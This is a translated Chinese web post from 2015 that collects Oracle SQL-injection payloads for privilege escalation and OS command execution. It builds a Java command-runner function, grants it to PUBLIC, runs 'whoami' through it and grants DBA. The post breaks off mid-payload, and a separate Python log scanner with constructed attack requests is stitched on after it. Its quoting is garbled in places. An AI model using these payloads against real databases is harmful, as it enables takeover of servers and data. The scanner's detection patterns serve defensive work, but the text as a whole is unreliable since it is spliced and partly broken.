
Oracle blind-injection error-based statements and Oracle privilege-escalation statements: a summary

Source: 自学PHP网    Date: 2015-04-17 13:03


and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””begin dbms_java.grant_permission(”””PUBLIC””””, ””””SYS:java.io.FilePermission””””,””””<>””””, ””””execute””””);end;””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null-
 
Create Function
 
http://ooo/1.jsp?1=String'’ and (select
 
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”
 
.PUT(:P1);EXECUTE IMMEDIATE
 
”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create
 
or replace function LinxRunCMD(p_cmd in
varchar2) return varchar2 as language java name
 
””””LinxUtil.runCMD(java.lang.String) return String””””;
 
””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null-
 
Grant function execute privilege
 
http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””grant all on LinxRunCMD to public””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null –
 
Execute OS code
 
http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami’) from dual) is not null-
 
Using Java privileges
 
Affected versions: 10g R2, 11g R1 and 11g R2
 
a) DBMS_JAVA.RUNJAVA
 
Affected versions: 11g R1, 11g R2
 
http://ooo/1.jsp?1=String'’ and (SELECT DBMS_JAVA.RUNJAVA (‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>C:\\OUT.LST’) FROM DUAL) is not null –
 
b) DBMS_JAVA_TEST.FUNCALL
 
Affected versions: 10g R2, 11g R1, 11g R2
 
http://ooo/1.jsp?1=String'’ and (Select DBMS_JAVA_TEST.FUNCALL (‘oracle/aurora/util/Wrapper’,'main’,'c:\\windows\\system32\\cmd.exe’,'/c’,'dir>c:\\OUT2.LST’) FROM DUAL) is not null—
 
DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
 
Affected versions: Oracle 8, 9, 10g R1, 10g R2, 11g R1
 
 
1. Create Library
 
http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str+=stemp+”\n”;myReader.close();return str;} catch (Exception e){returne.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+”\n”;myReader.close();return str;} catch (Exception e){return e.toString();}}}””;END;”;END;–‘,’CCCCC’) from dual) is not null-
 
2. Granting JAVA permissions
 
http://www.2cto.com /1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ””””LinxUtil.runCMD(java.lang.String) return String””””;””;END;”;END;–’,'CCCCC’) from dual) is not null –
 
3. Making the function executable by PUBLIC
 
http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE ””grant all on LinxRunCMD to public””;END;”;END;–‘,’CCCCC’) from dual) is not null –
 
4. Executing OS code
 
http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami ‘) from dual) is not null –
 
After patching: requires the CREATE PROCEDURE privilege
 
1. Create Function
 
http://www.2cto.com /default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ”create or replace function pwn2 return varchar2 authid current_user is PRAGMA autonomous_transaction;BEGIN execute immediate ””grant dba to scott””;commit;return ””z””;END; ”; commit; end;’) from dual) is not null –
 
2. Exploiting SYS.LT
 
http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ” begin SYS.LT.CREATEWORKSPACE(””A10”””” and scott.pwn2()=””””x””); YS.LT.REMOVEWORKSPACE(””A10”””” and scott.pwn2()=””””x””);end;”; commit; end;’) from dual) is not null –
 
Let's look at the October 2010 CPU (vulnerable versions: 10g R1, 10g R2, 11g R1 and 11g R2) and at the vulnerability in the package sys.dbms_cdc_publish.create_change_set, which allows a user holding EXECUTE_CATALOG_ROLE to become DBA.
 
http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMAAUTONOMOUS_TRANSACTION
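As a defender-side addition (not part of the original post): a small Python scanner that URL-decodes request targets from combined-format web access logs and flags the Oracle packages and PL/SQL constructs that the payloads above rely on (DBMS_EXPORT_EXTENSION, DBMS_JAVA, DBMS_REPCAT_RPC, DBMS_XMLQUERY, nested EXECUTE IMMEDIATE with PRAGMA AUTONOMOUS_TRANSACTION, grants to PUBLIC or of DBA). The log lines, IP addresses and scoring weights are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Oracle packages the page's payloads reach through SQL injection.
DANGEROUS_PACKAGES = [
    "DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES", "DBMS_JAVA.RUNJAVA",
    "DBMS_JAVA_TEST.FUNCALL", "DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC",
    "DBMS_XMLQUERY.NEWCONTEXT", "DBMS_CDC_PUBLISH.CREATE_CHANGE_SET",
]
# PL/SQL constructs that recur in the same payloads: nested dynamic SQL,
# autonomous transactions, grants, and Java wrapper/source creation.
SUSPICIOUS_PATTERNS = [
    r"PRAGMA\s+AUTONOMOUS_TRANSACTION", r"EXECUTE\s+IMMEDIATE",
    r"GRANT\s+(ALL|DBA)\b", r"LANGUAGE\s+JAVA\s+NAME", r"COMPILE\s+JAVA\s+SOURCE",
]

def score_request(raw_url):
    """URL-decode a request target and report which indicators it contains."""
    text = re.sub(r"\s+", " ", unquote_plus(raw_url).upper())
    packages = [p for p in DANGEROUS_PACKAGES if p in text]
    patterns = [p for p in SUSPICIOUS_PATTERNS if re.search(p, text)]
    # Constructed weighting: a package name counts more than a generic keyword.
    return {"packages": packages, "patterns": patterns,
            "score": 3 * len(packages) + len(patterns)}

def scan_access_log(lines, threshold=3):
    """Return (path, result) for each combined-format log line scoring >= threshold."""
    hits = []
    for line in lines:
        parts = line.split('"')  # the request line sits between the first quotes
        fields = parts[1].split(" ") if len(parts) > 1 else []
        if len(fields) < 2:
            continue
        result = score_request(fields[1])
        if result["score"] >= threshold:
            hits.append((fields[1].split("?")[0], result))
    return hits

# Constructed sample lines (not from the page): one benign request, then two
# modelled on the "grant all ... to public" and "grant dba" payloads above.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Apr/2015:13:03:00 +0800] "GET /1.jsp?1=42 HTTP/1.1" 200 512',
    '10.0.0.9 - - [17/Apr/2015:13:04:10 +0800] "GET /1.jsp?1=String%27%20and%20(select%20SYS.'
    'DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,%27DBMS_OUTPUT%22.PUT(:P1);'
    'EXECUTE%20IMMEDIATE%20%22DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;BEGIN%20EXECUTE%20IMMEDIATE'
    '%20%22%22grant%20all%20on%20LinxRunCMD%20to%20public%22%22;END;%22;END;--%27,%27SYS%27,0,%271%27,0)'
    '%20from%20dual)%20is%20not%20null%20-- HTTP/1.1" 500 1024',
    '10.0.0.9 - - [17/Apr/2015:13:05:30 +0800] "GET /default.jsp?1=1%20and%20(select%20'
    'dbms_xmlquery.newcontext(%27declare%20PRAGMA%20AUTONOMOUS_TRANSACTION;%20begin%20execute'
    '%20immediate%20%22grant%20dba%20to%20scott%22;%20end;%27)%20from%20dual)%20is%20not%20null'
    '%20-- HTTP/1.1" 500 900',
]
```

The same indicator lists can be fed to a WAF rule or to database audit review; the durable fix the page's headings imply is revoking PUBLIC execute on these packages and applying the relevant CPU.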
